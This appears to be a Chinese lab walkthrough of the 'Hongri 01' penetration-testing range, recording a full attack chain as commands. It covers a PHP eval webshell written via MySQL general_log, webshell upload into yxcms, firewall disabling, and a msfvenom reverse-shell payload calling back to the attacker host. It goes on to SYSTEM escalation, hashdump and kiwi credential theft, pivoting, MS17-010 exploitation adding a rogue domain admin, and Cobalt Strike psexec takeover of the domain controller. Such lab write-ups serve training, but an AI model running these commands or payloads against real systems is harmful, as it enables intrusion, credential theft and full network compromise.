红日靶场01

一、环境搭建

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
kali+CS
192.168.43.33
win7----admin@123
外网:192.168.43.17
内网:192.168.52.143
可以Ping通外网
通192.168.52.138(win2008)
通192.168.52.141(win2003)
小皮必须是自带的,下载的新版本会导致kali机连接目标失败
问题原理:自行理解
win2008---admin@123
192.168.52.138
win2003---admin@123
192.168.52.141
内网两台不出网win互通
win7开启phpstudy
win11访问80端口得到phpstudy探针

win2003

win2008

win7Ping

二、外网渗透

一、信息收集

端口扫描

1
2
3
4
nmap -A -p -min-rate 10000 192.168.43.17
#发现开启了80,3306端口
#访问发现80端口是php探针
#得到了探针的绝对路径 C:/phpst2016/WWW/l.php

php探针

目录爆破

1
2
3
dirsearch -u http://192.168.43.17
#出了一些有用信息
#phpMyadmin,phpinfo.php,l.php,

dirsearch

访问phpMyadmin

1
2
3
#发现是一个后台界面
#直接弱口令登录成功
root root

后台登陆

弱口令登录成功

弱口令登录

拿到webshell

1
2
3
4
5
#通过日志文件写入一句话来获取webshell:
#写入webshell-网站根目录下shell,把日志log改为php
SET global general_log = 'ON'
SET global general_log_file= 'C:/phpst2016/WWW/shell.php'
select "<?php eval($_POST['111']);?>"

改​​​

改2

​​上小马​​​​

蚁剑连接shell.php

1
2
3
4
#打开蚁剑
#新建连接
#输入URL:http://192.168.43.17/shell.php
#输入密码:111

蚁剑链接成功

信息收集

1
2
#发现目标存在yxcms,尝试访问
#在首页发现了后台地址和管理员账密

​![YXCMS (2)](assets/YXCMS 2-20231108125832-qjzn04w.png)​

YXCMS

进入yxcms后台

1
2
3
#网址输入:http://192.168.43.17/yxcms/index.php?r=admin
#admin 
#123456

进入后台

利用文件上传

CMS马子

蚁剑连接

1
2
3
4
5
#小提一下,马子上传了,不知道马子绝对路径怎么办?
#前面我们不是发现phpstudy文件夹下存在beifen.rar
#猜测应该是yxcms的备份文件
#解压之后,可通过查找acomment.php文件来确定文件上传的路径
#/yxcms/protected/apps/default/view/default

​​后台模板上马子
马子路径

1
#URl:http://192.168.43.17/yxcms/protected/apps/default/view/default/cmsshell.php

蚁剑链接CMS马子

1
至此,已经拿到Webshell

后渗透

后渗透阶段,当我们已经将小马上传到web服务器上时,可以用webshell管理工具进行下一步渗透了。

蚁剑终端关闭win7防火墙

1
2
3
4
#关闭win防火墙
netsh advfirewall set allprofiles state off 
#查看防火墙配置状态
netsh advfirewall show allprofile state

蚁剑关闭win7防火墙

win防火墙关闭kali机Ping通

msf生成exe并开启监听

1
2
3
4
5
6
7
8
9
10
11
12
#kali创建后门程序
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.33 LPORT=10888 -f exe -o 233.exe 

#蚁剑上传233.exe
#蚁剑终端运行233.exe

#kali开启监听,设置sessions
use exp/multi/handler
set payload windows/x64/meterpreter_reverse_tcp 
set lhost 192.168.43.33
set lport 10888
run

​​233

msf生成马子监听上线

拿到win7shell

1
2
3
4
5
6
7
#尝试提权   
#因为是administrator用户,
#所以很容易提权成功。
shell
getuid
getsystem
getuid

简单提权sys32

利用msf进行内网信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
chcp 65001         ---可解决乱码问题
route print        ---锁定内网C段
net time /domain   ---锁定域控192.168.52.138
net user /domain   ---锁定域内五个账户
ipconfig /all      ---锁定域名
net view           ---锁定域内主机
net group "domain admins" /domain     ---查询域管理员

------------
域名:god.org
域内五个用户:Administrator、Guest、liukaifeng01、ligang、krbtgt
域内三台主机:OWA(win2k8)、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)
域控:OWA(192.168.52.138)
win7内网ip:192.168.52.143
------------

MSFping域控

MSF锁定域内成员五个

查询域内其他主机

hashdump

1
hashdump    ---导出本地用户账号密码,该命令的使用需要系统权限。

hashdump

1
2
3
4
5
#CMD5解密
---#hash解密为空:
---#因为当系统为win10或2012R2以上时,
---#默认在内存缓存中禁止保存明文密码,密码字段显示为null,
---#需要修改注册表等用户重新登录后才能成功抓取。

CMD5hash解密

抓取域内账密

1
2
3
4
5
#利用msf的kiwi模块+system权限
load kiwi         #加载kiwi模块
help kiwi         #查看kiwi模块的使用
creds_all         #列举所有凭据
creds_kerberos    #列举域内账密 Administrator  admin@123

​![load kiwi+creds_all](assets/load kiwi+creds_all-20231108133200-gn82sit.png)​

creds_kerberos

CS上线win7

1
2
3
4
5
6
7
8
9
10
11
12
#楼楼用的是tools的CS
#CS的基本使用楼楼就不做多说明了
#kali机作为服务端,本地win11为客户端
#服务端启动
./teamserver  192.168.43.33 123456 
# 这里的ip是服务端ip,后续客户端连接此ip登录
win11:
直接运行runcatcs.vbs即可(仅限windows),
其他系统执行:java -jar cat_client.jar client

#设置监听器
#生成木马-->artifactHRmsf.exe

CS生成木马

1
2
3
#蚁剑上传artfactHRmsf.exe到win7
#运行木马程序
#CS上线成功

蚁剑上传木马

CS上线成功

1
2
3
#简单提权
elevate   ---#提权成功
sleep 1  ---#设置回弹时间间隔

CS提权成功system

横向渗透

为了让 msf 能访问内网的其他主机,即 52 网段的攻击流量都通过已渗透的这台目标主机(Win7)的meterpreter会话来传递,需要建立socks反向代理。

socket代理

1
2
3
#添加代理
run autoroute -s 192.168.52.0/24  # 添加内网的路由
run autoroute -p                  # 查看路由

添加路由+挂上代理

1
2
3
4
5
6
7
8
#开启代理
background   #将此会话保存为一个sessions
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVPORT 9080
set SRVHOST 127.0.0.1
run
jobs    #运行后挂起一个job

4a代理

1
2
3
4
5
6
#修改配置文件
#在proxychains的配置文件
vim /etc/proxychains4.conf
#添加本机的1080端口:
socks4 127.0.0.1 1080
#ping 域内成员

1080

proxychains通

漏洞扫描

1
2
3
4
5
#利用nmap对域内主机进行漏洞扫描
nmap --script=vuln 192.168.52.141
nmap --script=vuln 192.168.52.143
nmap --script=vuln 192.168.52.138
#发现都存在ms17_010漏洞

nmap+win2k8+win7

nmap扫描win2k3

win7+msf17-010

msf利用ms17-010

1
2
3
4
5
6
search ms17-010
use 2
set RHOST 192.168.52.141/143/138
set COMMAND net user
run
#发现除了win7。win2k3,win2k8都可以利用成功

138+ms17+rce成功

141+ms17+rce成功

143+win7+失败

尝试给域控win2k8添加管理员

1
2
3
4
5
6
#添加管理员
set  COMMAND net user awy233 awy@233 /add
set COMMAND net user
set COMMAND net localgroup administrators awy233 awy@233 /add
set COMMAND net localgroup administrators
#添加成功,但3389毫无反应

138+添加awy233成功

138+添加管理员+成功

138+成功截图←

尝试开启域控3389端口

1
2
3
4
5
6
#关闭防火墙
set COMMAND netsh advfirewall set allprofiles state off 
#3389
set COMMAND wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
set COMMAND REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
#登不上,不知道为什么

​![屏幕截图 2023-11-08 141233](assets/屏幕截图 2023-11-08 141233-20231108141247-33xzu1g.png)​

利用SMB Beacon拿下域控

1
2
3
4
5
6
7
8
9
10
11
12
#使用条件:
#具有 Beacon 的主机必须接受 445 端口上的连接。
#只能链接由同一个 Cobalt Strike 实例管理的 Beacon。
#必须有目标主机的管理员权限或者说是拥有具有管理员权限的凭据。

#新建监听器
#payload选择Beacon SMB

#右键域控,选择psexec攻击
#设置参数

#成功

SMB监听

选择域控

​![屏幕截图 2023-11-08 142244](assets/屏幕截图 2023-11-08 142244-20231108142358-dpyzs40.png)​

SMB攻击成功全部拿下​​